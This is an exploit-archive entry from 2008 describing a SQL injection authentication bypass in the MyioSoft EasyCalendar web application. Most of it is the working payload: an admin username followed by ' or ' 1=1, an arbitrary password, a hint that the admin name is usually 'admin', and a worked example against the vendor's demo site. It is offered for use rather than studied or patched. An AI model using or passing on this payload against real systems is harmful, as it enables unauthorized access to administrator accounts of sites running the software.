MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability

2008-11-07T00:00:00
ID 1337DAY-ID-4119
Type zdt
Reporter ZoRLu
Modified 2008-11-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
======================================================================


[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyCalendar/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu




#  0day.today [2018-04-13]  #